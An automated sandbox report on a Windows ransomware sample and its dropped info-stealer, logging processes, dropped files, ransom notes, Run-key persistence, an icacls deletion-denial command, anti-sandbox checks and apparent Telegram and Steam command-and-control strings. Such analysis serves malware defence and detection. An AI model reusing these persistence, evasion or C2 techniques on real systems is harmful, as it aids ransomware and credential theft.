                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: build2.exe, 00000005.00000003.1893912536.0000000009937000.00000004.00000020.00020000.00000000.sdmp, FCBAEHCAEGDHJKFHJKFI.5.dr, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: build2.exe, 00000005.00000002.2909786657.00000000039BF000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2919066610.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, ReversingLabs: Detection: 86%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Virustotal: Detection: 78%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, String found in binary or memory: set-addPolicy
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe String found in binary or memory: id-cmc-addExtensions
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe File read: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: unknown Process created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: unknown Process created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe --Task
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Process created: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Process created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe Process created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                Source: unknown Process created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                Source: unknown Process created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static file information: File size 1150976 > 1048576
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1964607470.0000000003AD0000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323506783.0000000003F3B000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2323100107.0000000003F23000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2314739889.0000000003F03000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2322324444.0000000003EE2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2319577426.0000000003ECB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\PS source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2321203058.0000000003CA7000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2320687899.0000000003CA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2313914869.0000000003CA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2324655611.0000000003CAC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316130649.0000000003CCD000.00000004.00000020.00020000.00000000.sdmp
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeUnpacked PE file: 5.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeUnpacked PE file: 5.2.build2.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA2220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,0_2_00BA2220
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /4
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /19
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /31
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /45
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /57
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /70
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /81
                Source: sqlite3[1].dll.5.drStatic PE information: section name: /92
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BB8565 push ecx; ret 0_2_00BB8578
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00308565 push ecx; ret 2_2_00308578
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319598 push esi; ret 2_2_0031959C
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003195C2 push edi; ret 2_2_003195C8
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_003196FD pushfd ; retn 003Ah2_2_003196FE
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319729 pushfd ; retn 003Ah2_2_0031972A
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_0031974E pushfd ; retn 003Ah2_2_0031974F
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319A87 push edi; ret 2_2_00319A8B
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00319BAC push esi; ret 2_2_00319BB0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BB8565 push ecx; ret 3_2_00BB8578
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00402854 push ecx; ret 4_2_00402867
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00403FF1 push ecx; ret 4_2_00404004
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005D616F push esi; ret 4_2_005D6171
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005D0E05 push ecx; ret 4_2_005D0E18
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_005DCFE5 push 3BFFFFFFh; retf 4_2_005DCFEA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00637859 push ecx; ret 4_2_0063785A
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00638A27 push ebp; retf 4_2_00638A28
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 4_2_00635E7A push ecx; ret 4_2_00635E80
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00420465 push ecx; ret 5_2_00420478
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_004257CF push esi; ret 5_2_004257D1
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61EDA2A8 push ds; retf 5_2_61EDA2AE
                Source: initial sampleStatic PE information: section name: .text entropy: 7.652702953960109

                Persistence and Installation Behavior

                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dllJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wct3D66.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\wctF86A.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\Local Settings\Temp\tmp3BC7.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeFile created: C:\Users\user\_readme.txtJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00C11920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,0_2_00C11920
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7772, type: MEMORYSTR
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStalling execution: Execution stalls by calling Sleepgraph_3-41451
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeStalling execution: Execution stalls by calling Sleepgraph_2-42184
                Source: build2.exeBinary or memory string: DIR_WATCH.DLL
                Source: build2.exeBinary or memory string: SBIEDLL.DLL
                Source: build2.exeBinary or memory string: API_LOG.DLL
                Source: build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: @CMDVRT64.DLLCMDVRT32.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLL...\*.*\7.32B42C548F42FDA81B4A288299BD7F129HTTPS://T.ME/BG3GOTYMEDVSMOZILLA/5.0 (X11; UBUNTU; LINUX X86_64; RV:109.0) GECKO/20100101 FIREFOX/112.0 UACQHTTPS://STEAMCOMMUNITY.COM/PROFILES/76561199601319247HELLOWFQY12O5J6NR.$V
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B91193 rdtsc 0_2_00B91193
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_00361920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00361920
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,0_2_00B9E670
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_002EE670
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,3_2_00B9E670
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeThread delayed: delay time: 700000Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wctF86A.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dllJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpJump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wct3D66.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\wctF86A.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\Local Settings\Temp\tmp3BC7.tmp.cdqw (copy)Jump to dropped file
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wct3D66.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeEvasive API call chain: GetSystemTime,DecisionNodes
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-38466
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe TID: 7712Thread sleep count: 147 > 30Jump to behavior
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe TID: 3272Thread sleep time: -700000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00416190 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004162C2h5_2_00416190
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA0160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00BA0160
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00B9F730
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00B9FB98
